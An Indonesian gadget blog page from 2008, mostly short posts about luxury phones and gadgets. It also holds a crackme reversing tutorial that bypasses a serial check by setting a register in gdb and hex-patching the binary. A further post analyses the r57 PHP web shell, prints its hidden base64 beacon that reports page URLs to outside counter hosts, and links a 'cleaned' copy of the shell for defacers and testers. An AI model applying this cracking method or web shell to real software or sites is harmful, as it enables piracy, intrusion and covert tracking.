Pages

25 Desember 2008

WoWWee Femisapien

wowwee femisapien

Segala macam alat elektronik yang ada disekitar kita merupakan robot yang tanpa kita sadari telah manyatu dalam keseharian kita. Baik itu membantu kita dalam menghitung, belajar, sampai membantu dalam menciptakan karya-karya oxtradinary. WoWWee adalah salah satu "robot wanita" yang dapat menari, mencium dan berinteraksi dengan manusia maupu dengan robot lainnya. Robot ini pun dapat mengekspresikan emosinya dengan menperdengarkan suaranya dalam bentuk yang khas. Misalkan ketika dia sedih maka ia akan menangis dengan sedihnya, atau pun ketika ia gembira maka ia akan tertawa tebahak-bahak.

Robot ini dilengkapi dengan alat perekam yang dapat merekam suara sampai dengan 90 menit. Dan juga dilengkapi dengan 2 slot infra merah dimasing-masing sisinya.

Ada 3 jenis WoWWee yang diperkenalkan pada ajang robot contest 2008 kemarin. The attentive mode, the responsive mode dan the learning mode. Berminat ???

Read rest of entry

Gaming Keyboard OLED Teranyar


gaming keyboard

Organic Light Emitting Diode atau OLED ini adalah keyboard yg memiliki teknologi canggih dalam hal gaming. Karena dilengkapi dengan 9 tambahan OLED yg sangat berfungsi dalm game. Ini mempermudah para gamer untuk menjalankan karakter game RPG atau game War yang membutuhkan banyak pergerakan dan taktik yang tidak membutuhkan waktu berfikir lama. Keyboard ini sudah dilengkapi dengan penghasil tenaga sendiri atau power supply untuk membuatnya berfungsi maksimal. Jadi, tidak usah meragukan kinerja OLED satu ini. Hanya saja harganya ditaksir masih cukup mahal untuk kantong para gamer yg kebanyakan masih berstatus pelajar atau mahasiswa. Tapi kalau pelajar atau mahasiswa yang kelebihan uang, yah lain lagi ce

Read rest of entry

Ponsel Musik Dengan 25 Speaker !!!

Ponsel musik pada umumnya memiliki dual speaker stereo, tapi ponsel musik yang satu ini sungguh ajaib. Tidak tanggung-tanggung, ponsel ini memiliki 25 lubang speaker yang berjajar rapih, yang terletak di bagian belakang ponsel. Dua puluh lima lubang speaker tersebut berjajar lima baris ke samping dan lima baris ke bawah.

Ponsel asal Shenzen, Guangdong, Cina ini juga memiliki label yang sungguh unik, Yamaha Xpressmusic. Tapi, ponsel ini bukan ponsel Yamaha atau keluaran Nokia yang memiliki merek dagang XpressMusic pada ponsel segmen musiknya. Produsennya memberi nama ponsel ini dengan seri Jinpeng S108.

Ponsel unik ini dibandrol dengan harga hanya 94 dolar AS belum termasuk ongkos kirim. Dagangan unik ini dipajang di www.eemobi.cn. Namun, si penjualnya tidak memberi keterangan lebih rinci tentang kualitas musiknya.

Situs tempat ponsel ini dipamerkan seperti toko online. Dapat melayani pengiriman ke seluruh dunia dan ada simulasi biaya pengiriman. Meski tercantum alamat jelas yaitu di Office Address:No.2113, Fl 21, Block A, Star Plaza, Huaqiangbei, 518000, Shenzhen, Guangdong, China. Kalaupun Anda tertarik, ada beberapa hal yang mesti diperhatikan dan jadi pertimbangan. Pertama, waspada transaksi online. Apalagi menggunakan kartu kredit. Kedua ingat pula bahwa segala kerusakan dan kendala terhadap ponsel ini tidak ada jaminan garansi di Tanah Air. Salah-salah malah bakal jadi masalah
Read rest of entry

Vertu Boucheron 150 Dari Emas Murni

ImagePembuat ponsel mewah Vertu telah bekerja sama dengan rumah perhiasan Prancis Boucheron untuk menciptakan Vertu Boucheron 150, sebuah ponsel edisi terbatas dibuat dari emas murni.

Untuk persiapan perayaan 150th anniversary Boucheron's. Vertu Boucheron 150 dibuat dari emas utuh ingots, membutuhkan 1000 jam untuk memotong dan membentuk, 700 jam untuk mempolish dengan tangan, dan 500 jam untuk pembentukan dengan tangan.

Cekungan kristal safir Tombol intricately dirancang dengan 400 poin, yang memberikan tantangan terberat bagi kebanyakan dari pengrajin terampil. Sudut permukaan yang selalu berubah, terinspirasi jelas oleh segi batu yang merupakan bagian inti kerajinan dari Boucheron.

Boucheron 150 yang telah dibuat untuk mencerminkan kedua merek. Vertu yang V-shape morphs dalam bentuk pola acak manis dan arah dari tiga sisi permukaan membuat campuran elemen Vertu dan Boucheron. Ia mendapatkan visual berkilau tidak dari batu tetapi dari murninya bentuk dan segi logam mulianya.

Casing Boucheron 150 dibuat oleh Reuge, pembuat casing dari kayu hand made yang merupakan market leader dari seniman pembuat music boxes di Swiss. Vertu Boucheron 150 dibanderol seharga $30.000, dan akan di pajang di display Vertu di London pada 19 November besok.


by : T&t Magz

Read rest of entry

10 Desember 2008

Ponsel Pistol ???

ImagePonsel mempunyai berbagai macam fungsi, dari fungsi standarnya yaitu sebagai alat komunikasi jarak jauh, hingga fungsi multimedia seperti video dan mp3 player, dan hiburan seperti kamera dan internet. Di negara Italia, fungsi ponsel bertambah satu lagi yaitu sebagai pistol.

Hape pistol disini maksudnya bukan hanya sekedar pistol mainan, karena hape itu memang bisa menembakkan peluru. Sebanyak empat peluru bisa dimasukkan dan kekuatan tembaknya hampir sama dengan pistol pada umumnya.

Inilah senjata (yang disamarkan) baru yang dipersenjatakan pada kepolisian Italia. Dari luar, gadget ini tampak serupa dengan ponsel asli. Namun blum diketahui secara pasti, ponsel ini dapat digunakan untuk menelepon atau tidak.

by : Tt Magz
Read rest of entry

MAC OS X Reversing Tutorial for Beginner

Tutorial ini hanya terbatas untuk opcode x86, bukan PPC karena yang saya punya cuman hackint0sh.

Di sini saya akan mencoba membahas crackme yang paling simpel yang dibuat oleh CorruptFire yaitu boolRegistered.

Kracking Tools
Sebelum kita mulai tentunya kita harus mengetahui tools2 apa saja yang akan kita gunakan. Apakah kita akan menggunakan Olly Debugger sama seperti di windows?tentu tidak karena sejauh ini belum ada yang membuat kracking tools dengan tampilan GUI seperti OllyDbg. Tools yang akan kita gunakan antara lain:
1. Debugger, untuk keperluan ini kita gunakan gdb. GDB dibundle jadi satu dengan Apple Developer Tools.
2. Disassembler, kita akan menggunakan otx dari http://otx.osxninja.com dan class-dump
3. HexEditor, kita akan menggunakan 0xED.

gdb
GDB adalah GNU Project Debugger, yang akan digunakan untuk melakukan tracing selama program di eksekusi. Dengan adanya gdb, kita bisa melakukan tugas2 antara lain:
1. Start program atau attach program yang telah berjalan
2. Break, untuk menghentikan sementara program yang sedang berjalan seakan2 program tersebut hang
3. Mengetahui apa yang terjadi selama program tersebut berhenti.

GDB sudah dibundling dengan XCode, jadi jika sudah menginstall XCode, tinggal jalankan gdb aja.

otx

“otx stands for "object tool extended". It uses otool (object tool) to disassemble a Mach-O executable file, then enhances the disassembled output. Simple enhancements include adding the machine code of each instruction and the offset of each instruction from the beginning of a function.
More complicated enhancements include displaying the names and data types of Objective-C methods even if symbols have been stripped, and adding comments that describe member variables, function calls, static data and more.”
-taken from http://otx.osxninja.com/otwtf.html

You might also be asking yourself what the hell a disassembler is. I’ll tell you what it is...with some help from Wikipedia: http://en.wikipedia.org/wiki/Disassembler

class-dump
Aplikasi yang mendisassemble suatu program dengan mengeluarkan hanya judul class-nya saja.

HexEditor
“A hex editor is a program which allows you to edit compiled programs and binary data-files. These editors are called hex editors because they most often present data in hexadecimal format. Hexadecimal is used because it is easier for most humans than working in binary. In addition, hexadecimal is frequently useful because computers tend to work with 8-bit bytes of information and because ASCII is an 8-bit code.”
- taken from http://www.tech-faq.com/hex-editor.shtml

Hehe... agak males nulisnya jadi copy paste ajah. Ok, langsung aja tu de poin. Dalam melakukan kracking, tentu dikenal tahapan2 yang harus dilakukan yaitu Testing untuk mengetahui bagian mana yang akan dipatch, Disassembling, Debugging untuk mengetahui bagian mana yang seharusnya di-patch dan yang terakhir adalah Patch.

Testing
Tahapan ini adalah menjadi sangat penting karena mulai dari sini kita bisa mengetahui perilaku program tersebut, apakah menggunakan serial checking, file lisensi, online activation dll.

Jalankan program boolRegistered dan masukkan sembarang username dan serial



Jika nama dan serial yang kita masukkan salah maka akan keluar Error Serial Error bla..bla..bla...

OK, what next?
Selanjutnya kita masuk ke tahap disassembling, pertama kita jalankan class-dump dari Terminal



dan buka file hasil class-dump



Kita lihat di atas ada beberapa class yang kelihatannya menarik yaitu isRegistered(Boolean), checkRegister dan validateSerial(Boolean). Dan untuk melihat code-nya lebih dalam kita gunakan tool disassembler yang lain yaitu otx.

Buka OTX dan drag aplikasi boolRegistered ke window otx



Buka file hasil disassembler, scroll down.... dan kita akan ketemu class2:

  • AppManager awakeFromNib
    Fungsi ini merupakan fungsi inisiasi

  • AppManager applicationDidFinishLaunching
    Fungsi-fungsi yang dijalankan ketika aplikasi telah berjalan

  • AppManager checkRegister:
    Fungsi check register

  • AppManager isRegistered
    Fungsi check apakah sudah ter-register atau belum

  • AppManager validateSerial:forName:
    Fungsi check terhadap nama dan serial yang di-inputkan


OK, sekarang kita coba lihat class checkRegister dan ada sesuatu yang menarik yaitu string isEqual



Bagaimana kita menterjemahkan opcode di atas? Sebenernya untuk menterjemahkan hanya diperlukan logika sederhana dengan menggunakan string-string yang telah di tampilkan, misalnya untuk code di atas kita kumpulkan dahulu semua yang bisa kita baca secara logika misalnya kata-kata isEqual dan di bawahnya ada string "The Name you entered is not valid..." yang didahului dengan opcode testb dan je.

Secara logika berarti pada isEqual terdapat pengecekan sesuatu terhadap sesuatu dan jika hasil pengecekan itu salah maka akan menampilkan Error Message "The Name you entered is not valid...".

Dari error message tersebut bisa dipastikan bahwa yang dimaksudkan pada isEqual adalah pengecekan terhadap nama yang dimasukkan. Jika pengecekan benar maka akan lompat ke address 0x00002a04 dimana address tersebut akan melanjutkan pengecekan terhadap serial yang dimasukkan.

Next, kita trace lagi address 0x00002a04 dan ternyata ada lagi isEqual



tapi untuk rutin pengecekan yang satu ini kita lihat bahwa jika serial yang dimasukkan tidak benar(jne) maka akan lompat ke address 0x00002bc7 dimana jika kita lihat di address tersebut, yang tampil adalah error message "The Serial you entered is not valid. Please cheeck it and try again." Jika kita teliti lebih dalam mulai dari address 0x00002bc7 dan scroll ke atas maka akan kita temui kata2 "successSheet dan itulah yang kita maksud.

Jadi agar pengecekan serial itu "selalu" benar, maka kita harus melakukan patching terhadap salah satu decision sehingga serial apapun yang selalu dimasukkan akan menjadi benar.



OK, balik lagi ke address 0x00002a5i yang berisi instruksi jnel 0x00002bc7, kita turun lagi ke bawah sampai dengan ketemu fungsi validateSerial:forName:. Jadi disitulah pengecekan terhadap serial yang kita masukkan valid atau tidak.

Kita cari code dari class validateSerial:forName: lebih lanjut.



Di atas adalah sepenggal code dari class validateSerial:forName:. Tidak perlu dijelaskan arti masing2 baris instruksi karena saya sendiri enggak ngerti hehe.... Yang perlu diperhatikan adalah semua return value dari masing-masing fungsi call selalu dimasukkan ke register EAX. Jika EAX berisi 1 maka hasil dari pemaggilan fungsi call berarti benar dan begitu juga sebaliknya.

Patching

Kita bisa memulai proses patching pada address:
1. 0x00002a9a dengan mengeset register EAX menjadi 1
2. 0x00002c64 dengan melakukan force return menjadi 1

Sekarang kita coba patch pertama:

Jalankan gdb dan load aplikasi boolRegistered.app kemudia ketik "r"



Sekarang kita masukkan sembarang nama dan serial



Jangan dulu di klik register, tapi kita balik lagi ke Terminal
Ketik Ctrl+C trus ketik b *0x00002a9a dan ketik c



Setelah itu masuk ke aplikasi dan klik Register, maka otomatis kita balik lagi ke Terminal karena kita sudah nitip breakpoint ke address 0x00002a9a

Ketik set $eax=1, artinya kita akan memaksa register EAX berisi satu apapun hasil kalkulasi dari validateSerial:forName:
Ketik c



Masuk lagi ke aplikasi boolRegistered, dan hasilnya adalah:



Wohoho... berhasil...



Cara kedua:

Hapus semua breakpoint dengan mengetik d, pilih y
breakpoint pada address 0x00002c64 dengan mengetikkan b * 0x00002c64, ketik c
Klik Register pada aplikasi boolRegister maka akan balik lagi ke terminal


Ketik ret 0x1, ketik c



Hurrayyyy....

Tapi itu hanya sebatas trapping di gdb aja, bagaimana membuatnya menjadi permanen? yaitu dengan menulis langsung byte2 yang diperlukan di aplikasinya.

Buka Hex Editor kita misalnya pake 0xED.

Klik kanan pada aplikasi boolRegisterd dan pilih Show Package Contents




Masuk folder Contents > MacOs
Drag boolRegistered ke 0xED. Trus gimana kita biar tau bagian mana yang di patch?

Jadi yang akan kita patch adalah address 0x00002a9a dengan mengeset register EAX menjadi 1.

Hex dari address di atas adalah 84c0, jika jika hanya menggunakan nilai hex tersebut, mungkin banyak juga dari program tersebut menggunakan nilai yang sama. Untuk membedakan nilai hex pada address 00002a9a maka kita menggabungkan dengan nilai hexa di baris bawahnya yaitu 0f8425010000, jadi kalau digabungkan menjadi 84c00f8425010000 dan nilai hexa itu yang akan kita cari di hex editor.



Pada 0xED, Pilih menu Edit > Find > Find
Masukkan 84c00f8425010000 dan klik Find, untuk memastikan tidak ada duplicate, klik sekali lagi Find. Kalau itu hanya satu-satunya maka kita akan mulai proses patch.

jadi fungsi pada address 0x00002a9a yaitu:

testb %al, %al
jel 0x00002bc7

akan kita rubah menjadi



xor %eax, %eax ==> 31 C0
incl %eax ==> 40


karena ada 8 byte yang akan kita ganti jadi sisanya kita isi dengan opcode nop (90)

84c00f8425010000
31c0409090909090


OK, masuk ke 0xED, Pilih menu Edit > Find > Find

isi Find : 84c00f8425010000
isi Replace : 31c0409090909090



klik Replace


Klik Save. Close 0xED dan jalankan lagi aplikasi boolRegistered, kemudian isikan sembarang nama dan serial misalnya orakanggo dan 1234567
Klik Register.

voila!!!!!!!!

by : Jasakom
Read rest of entry

21 November 2008

Mozilla Goes to Handphone


CEO Mozilla, John Lilly menjelaskan bahwa Firefox Mobile versi alpha akan dirilis dalam waktu de

CEO Mozilla tersebut mengatakan mereka ingin memberikan pengalaman menjelajah web di perangkat mobile yang lebih dibanding apa yang sudah ditawarkan saat ini.

Sejatinya Firefox Mobile masih akan diluncurkan sekitar tahun 2010, namun versi alphanya akan dirilis tidak lama lagi. Versi alpha ini kemungkinan akan menghadirkan aplikasi-aplikasi baru yang belum pernah ada di web browser mobile manapun. Mari kita tunggu kehadirannya.

by : T&t Magz

Read rest of entry

Perpaduan Emas dan Berlian


Gresso Royal White Diamonds

GRESSO kembali mengeluarkan ponsel dengan desain super mewah. Kali ini Gresso memadukan material mahal seperti emas dan berlian pada bentuk desainnya. Terdiri dari 23 keypad yang terbuat dari emas dan berlian pada bagian atasnya. Bahkan pada logo Gresso depan dan belakang bodi pun bermaterikan emas. Edisi Gresso Royal White Diamonds ini merupakan limited editions yang produknya hanya berjumlah 200. Ponsel ini sudah menggunakan system operasi Windows Mobile 6 Standard. Jika tertarik membeli siapkan kocek Anda sebesar 33.000 euro. Tapi terdapat juga versi murahnya yang hanya bermaterialkan 4 berlian dengan harga 9000 euro.

SPESIFIKASI

Network : GSM 900/1800/1900 MHz

Dimension : 119,5x48x14 mm

Display : TFT display, 65K colors, 240x320 pixels Sapphire crystal glass of 42 K frames the screen.

FITUR LAIN

Windows Mobile 6 Standard, Internal memory: 64 Mb, External memory: 2 Gb, WAP 2.0, GPRS: class 10, Bluetooth 1.2, PC Synchronization, SMS/MMS, 64-tones polyphony, 2 MP camera (the maximum resolution of 1600*1200 pixels), Video and audio player (MIDI, WMA, WAV, AVI, ASF, WMV), Java, Language support: English, French, German, Russian, Italian, Spanish, Dutch, Chinese Simplified.


by : T&t Magz

Read rest of entry

Asus M930, Berbagai Konektivitas dalam Desain yang Stylish


Asus M930 perangkat genggam yang hadir dengan desain elegan, keyboard QWERTY, dan konektivitas 3,5G ini merupakan perangkat kelas dunia. M930 memberikan kemudahan dalam penggunaan, disertai produktivitas yang maksimal. Semuanya itu dalam satu balutan desain metal dan permukaan reflektif yang mengagumkan. Untuk keperluan fitur bisnis, M930 dilengkapi system operasi Windows Mobile 6 dan konektivitas penuh 3.5G yang membuat tangguh dalam semua urusan bisnis anda di mana saja.

Layar Ultra Lebar

M930 menghadirkan sudut penglihatan yang lebih baik dengan adanya display lansekap tambahan WQVGA, sehingga membuat konten browsing, membaca serta menulis dokumen dan pesan menjadi lebih nyaman dilihat mata. Lalu dengan adanya webcam yang tertanam, pengguna dapat menikmati pengalaman berkomunikasi lewat video yang lebih maksimal dilengkapi layer yang lebih lebar dan pengalaman berkomunikasi lewat video yang lebih maksimal dilengkapi layer yang lebih lebar dan lebih jelas.

Transfer Data Kecepatan Tinggi

Dengan dukungan GPRS, EDGE, WCDMA, HSDPA, Bluetooth 2.0, Wi-Fi dan USB 2.0, transfer data bisa lebih cepat dan nyaman. Waktu download untuk data yang berukuranbesar seperti video dan MP3 akan menjadi lebih cepat dengan adanya 3.5G. Lalu tidak hanya itu, walaupun berada pada area tanpa jaringan Wi-Fi, pengguna tetap dapat mengkonversikan M930 menjadi modem 3.5G dengan satu langkah mudah Quick Modem Setting, dan dengan mudah terhubung ke internet.



Spesifikasi ASUS M930

  • Networking System : HSDPA 3.6Mbps, UMTS 2100 EDGE/GPRS/GSM 850/1800/1900 MHz
  • OS : Microsoft Windows Mobile 6.1 Professional
  • Form Factor : Clam Shell
  • Color : Black
  • Dimensions : 113 x 54 x 18.7 mm
  • Weight : 158 g with Battery
  • Standby Time : 150-200 jam
  • Talk Time : 3G : 2 – 3 jam, 2G : 4 – 5 jam
  • Display External : 2.0”, 65000-color, TFT LCD, 240 x 320 pixels QVGA
  • Display Internal : 2.6”, 65000-color, TFT LCD, 400 x 240 pixels WQVGA
  • CPU : TI OMAP 2431 450 MHz
  • Memory : Built-in 256MB Flash ROM, 64MB SDRAM
  • Expansion Slot : Micro SD, Support SDHC
  • Communication : WLAN 802.11 b/g, USB v2.0, Bluetooth V2 +EDR
  • WAP : HTTP and WAP 1.2.1/2.0
  • Messaging : SMS/MSN/MMS/Email/ Push E-Mail
  • Battery : 1100 mAh Li-Ion
  • PIM & Utilities : Tasks, Calendar, Voice Notes, Clock & Alarm, Calculator, Contact, File Explorer, MSN
  • Business Aplications : iCam, ClearVue Document Viewer, Remote Presenter, Voice Recognition
  • Camera : 2 Megapixels, 0.3 Megapixels for Video Telephony
  • Video : MPEG 4 / H.263 / 3gp Playback and Record Audio/Video Streaming, Widescreen for Video Conferencing
  • Picture Format : JPEG, PNG, GIF, BMP
  • Audio Format : MP3, WMA, AAC, AAC+, 3GP
  • Ringtone : 128-chord Polyponic, MP3
  • JAVA : J2ME (CLDC 1.1 + MIDP 2.0)
by : T&t Magz
Read rest of entry

20 November 2008

Perfect 8 The New Gadget


Perfect 8 sebuah speaker yang menggunakan kaca sebagai bahan dasarnya memiliki kemampuan untuk memanjakan telinga Anda dengan kemampuannya untuk mengatur tata suara sesuai TV Anda entah dengan format 4:3 ataupun 16:9. Sesuai dengan namanya, ia mensertakan 2bh mid range driver 7" serta cone driver berukuran 5,2" plus sebuah silk dome tweeter dengan teknologi precision wave sehingga jika sebuah koin jatuh pun pada rekaman CD Anda, maka Andapun dapat mendengarnya. Magnificent! Harganya? 'hanya' $40.000. Yee...

by : T3 Indo Magz
Read rest of entry

"Hacker" yang di hack ??

Sebenarnya mungkin udah banyak yang tau.. bukan software yang digunakan yang aku titik beratkan disini.. tapi kehati-hatian kita menggunakan apa yang bukan buatan kita.. sapa tau ada sesuatu dibaliknya...

Singkat ajah.. nih aku ngebahas soal tool yang mungkin udah gak asing lagih ama yang biasa main ama keamanan suatu web atau server web yang ngedukung server side scripting yaitu "SHELL" yang menggunakan "interpreted language" kayak PHP . Disini aku nyontohin pake "r57 shell" yang bisa dengan mudah ditemukan di search engine.

Langsung yah.. Tau kenapa judulnya kukasih kayak begitu ?? karena aku pengen buktiin.. kalo tool hack ga semuanya punya maksud yang baik ( hehe.. mang ada yang baik ?? ya ada lah.. yang gak baik kan yang salah ngegunainnya ) . Disini aku nyontohin phpshell tadi dengan ilustrasi kode dibawah ini: bisa download dan bongkar sendiri :

ini aku temukan : coba cari variabel $c1 dan $c2 yang terenkripsi make base64. nih jelasnya :

$c1 =

Encoded :

PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2

JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l

lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW

FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L

3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr

J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR

oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj

xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO

i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv

dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB

ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2

hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==


Decoded :

=======================================================================================

$c2=

Encoded :


PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh

IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl

hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz

tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa

XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u

8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV

ybmV0LS0+


Decoded :

========================================================================================

hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)hotlog_js="1.3"hotlog_r+="&js="+hotlog_js;document.write("1")

Setelah diliat diatas.. dia tuh ngebikin rutin buat ngelog counter dan sepertinya jugak.. hehehe stealing something from you... liat sendiri lah yah di $c1 decoded version. Kalo misalnya variabel itu dihapus.. shell ga bakal jalan seperti diliat di fungsi dibawah :

fungsi :

if(empty($c1)||empty($c2)) { die(); }

$f = '

';

$f .= base64_decode($c1);

$f .= base64_decode($c2);

Jadi kalo mau dihapus , yah hapus $c1 , $c2 ama fungsi itu semuah.. baru normal lagi..

Tapi ini aku ngedit dari versi aslinya lho..

Alnya ada jugak yang dah ngubah atau nambahin script buat ngelog kedia.. dan dia naroh filenya di hosting dia.. kayak contohnya dulu di http://room-escape-games.com selain ngelog ke server yang bisa diliat di script diatas, dia jugak ngelog ke servernya.

Jadi .. Hati2 yah.. palagi para defacer tuh.. hehehe... lagi asik2nya nyoret2 di web.. eh ternyata dia ngantarin diri buat dicuri..

Hehehe...Juga buat para penetration tester.. hati2 yah... kita pengen baik malah jadi korban..

Jadi bersihin dulu yah toolnya.. tapi kalo males.. donlot ajah diwebku yang udah kubersihin.. di :

http://malcoder.info/clean.txt

Yah.. cek lagi lah sapa tau aku ada kelewatan.. tapi pas aku pake sih fine2 ajah.. alnya ga ada keluar lagih di status bar alamat2 asing.

oya maaf kalo ga semua script keliatan.. aku ga tau cara kerja situs jasakom apakah pake filtering yang kayak script gitu.. alnya berbentuk javascript.. jadi bukan salahku kalo script asli ga muncul..

greetz :

ALLAH SWT

MUHAMMAD SAW



by: http://jasakom.com
Read rest of entry
 

Information Technology & GadGet Copyright © 2009 Gadget Blog is Designed by Ipietoon Sponsored by Online Business Journal